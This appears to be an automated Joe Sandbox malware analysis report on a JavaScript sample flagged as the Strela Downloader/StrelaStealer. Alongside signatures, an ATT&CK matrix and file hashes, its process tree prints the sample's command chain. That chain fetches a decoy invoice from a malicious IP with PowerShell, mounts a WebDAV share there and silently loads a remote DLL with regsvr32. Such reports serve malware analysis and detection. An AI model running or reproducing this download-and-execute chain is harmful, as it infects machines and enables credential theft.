Windows
Analysis Report
1627923942308705884.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 6288 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\16279 2394230870 5884.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 6580 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user\A ppData\Loc al\Temp\in voice.pdf http://193 .143.1.205 /invoice.p hp"&&start C:\Users\ user\AppDa ta\Local\T emp\invoic e.pdf&&cmd /c net us e \\193.14 3.1.205@88 88\davwwwr oot\&&cmd /c regsvr3 2 /s \\193 .143.1.205 @8888\davw wwroot\265 3310892028 6.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 5480 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5824 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user\AppD ata\Local\ Temp\invoi ce.pdf htt p://193.14 3.1.205/in voice.php" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 4904 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\L ocal\Temp\ invoice.pd f" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 2044 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 7236 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --user-d ata-dir="C :\Users\us er\AppData \Local\CEF \User Data " --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 20 --field -trial-han dle=1692,i ,443330213 4584896886 ,159206924 7405289473 5,131072 - -disable-f eatures=Ba ckForwardC ache,Calcu lateNative WinOcclusi on,WinUseB rowserSpel lChecker / prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 3332 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | COM call: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Last function: | ||
Source: | Last function: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 122 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
5% | ReversingLabs | Script-JS.Trojan.StrelaStealer | ||
5% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1588533 |
Start date and time: | 2025-01-11 02:08:29 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 4m 56s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 16 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 1627923942308705884.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/59@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded IPs from analysis (whitelisted): 2.23.240.205, 2.16.168.107, 2.16.168.105, 3.219.243.226, 3.233.129.217, 52.22.41.97, 52.6.155.20, 162.159.61.3, 172.64.41.3, 184.28.90.27, 23.200.0.173, 23.200.0.196, 192.168.2.4, 23.209.209.135, 52.149.20.212, 23.217.172.185, 13.107.246.45
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, e16604.g.akamaiedge.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, crl.root-x1.letsencrypt.org.edgekey.net
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
20:09:26 | API Interceptor | |
20:09:31 | API Interceptor | |
20:09:31 | API Interceptor | |
20:09:44 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 1.3073409479891698 |
Encrypted: | false |
SSDEEP: | 3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrz:KooCEYhgYEL0In |
MD5: | D4FDB089AC1387650BBBC91FD083CCC7 |
SHA1: | CE860F06FE9B7F928D6333F86834ECB02F13EDA8 |
SHA-256: | 5C70CAD0646E96C0ADDCA931258986ACD0483DE882E2D98BD5DC39D4AFA3088B |
SHA-512: | 2870AAB3FC5646CF8BD3814A9A4C9F25E5C37C3BCA83001648370A4434242B77852C27114BFB29E035CF321C438CEBEFDC457F6FDEF356231645D3120DC0613E |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.4221372244268689 |
Encrypted: | false |
SSDEEP: | 1536:BSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Baza/vMUM2Uvz7DO |
MD5: | 232F48E0196C95BEDCB86AED7C6B20AC |
SHA1: | 53963843C620A2E97FB1267CABB2FDA3AF565F8D |
SHA-256: | 1B43791CF1F9082ECD65EFE3ECDCFA02A6665A16C8BB1A73A5F0939D7C5AD6C5 |
SHA-512: | 69EABCB2CE58E0231553193436BA85A066A3AD6CD70CA124DBA18758D0D1C02930BAEEE49AAAFBA4723C5F0E56C5D14980DBDE436D46F783CC99D263BD9A2DFD |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.07653170808331947 |
Encrypted: | false |
SSDEEP: | 3:cSl/lKYezFu9gCjn13a/Q/iY2YllcVO/lnlZMxZNQl:HlKzzF8v53qQ/XOewk |
MD5: | 3D02116802E062A5F8E93755EF86F73A |
SHA1: | 0FC51DC1498CF5E2B0738AEEA5C5B710350200E8 |
